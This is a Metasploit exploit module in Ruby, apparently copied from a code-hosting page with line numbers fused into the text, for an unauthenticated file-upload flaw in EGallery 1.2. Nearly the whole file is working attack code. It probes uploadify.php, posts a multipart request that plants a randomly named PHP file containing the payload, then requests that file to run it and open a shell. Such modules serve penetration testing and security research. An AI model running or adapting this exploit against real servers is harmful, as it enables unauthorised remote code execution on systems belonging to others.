Path: blob/master/modules/exploits/unix/webapp/egallery_upload_exec.rb
24348 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => "EGallery PHP File Upload Vulnerability",15'Description' => %q{16This module exploits a vulnerability found in EGallery 1.2 By abusing the17uploadify.php file, a malicious user can upload a file to the egallery/ directory18without any authentication, which results in arbitrary code execution. The module19has been tested successfully on Ubuntu 10.04.20},21'License' => MSF_LICENSE,22'Author' => [23'Sammy FORGIT', # Discovery, PoC24'juan vazquez' # Metasploit module25],26'References' => [27['CVE', '2012-10052'],28['OSVDB', '83891'],29['BID', '54464'],30['URL', 'http://web.archive.org/web/20170128123244/http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']31],32'Payload' => {33'BadChars' => "\x00"34},35'DefaultOptions' => {36'EXITFUNC' => 'thread'37},38'Platform' => ['php'],39'Arch' => ARCH_PHP,40'Targets' => [41['EGallery 1.2', {}]42],43'Privileged' => false,44'DisclosureDate' => '2012-07-08',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])57]58)59end6061def check62uri = target_uri.path6364res = send_request_cgi({65'method' => 'GET',66'uri' => normalize_uri(uri, "egallery", "uploadify.php")67})6869if res and res.code == 200 and res.body.empty?70return Exploit::CheckCode::Appears71else72return Exploit::CheckCode::Safe73end74end7576def exploit77uri = normalize_uri(target_uri.path)78uri << '/' if uri[-1, 1] != '/'7980peer = "#{rhost}:#{rport}"81payload_name = rand_text_alpha(rand(10) + 5) + '.php'82boundary = Rex::Text.rand_text_hex(7)8384post_data = "--#{boundary}\r\n"85post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n\r\n"86post_data << "#{payload_name}\r\n"87post_data << "--#{boundary}\r\n"88post_data << "Content-Disposition: form-data; name=\"folder\"\r\n\r\n"89post_data << "#{uri}\r\n"90post_data << "--#{boundary}\r\n"91post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"92post_data << "<?php "93post_data << payload.encoded94post_data << " ?>\r\n"95post_data << "--#{boundary}--\r\n"9697print_status("Sending PHP payload (#{payload_name})")98res = send_request_cgi({99'method' => 'POST',100'uri' => normalize_uri("#{uri}egallery/uploadify.php"),101'ctype' => "multipart/form-data; boundary=#{boundary}",102'data' => post_data103})104105# If the server returns 200 and the body contains our payload name,106# we assume we uploaded the malicious file successfully107if not res or res.code != 200 or res.body !~ /#{payload_name}/108print_error("File wasn't uploaded, aborting!")109return110end111112print_status("Executing PHP payload (#{payload_name})")113# Execute our payload114res = send_request_cgi({115'method' => 'GET',116'uri' => normalize_uri("#{uri}#{payload_name}")117})118119# If we don't get a 200 when we request our malicious payload, we suspect120# we don't have a shell, either. Print the status code for debugging purposes.121if res and res.code != 200122print_status("Server returned #{res.code.to_s}")123end124end125end126127128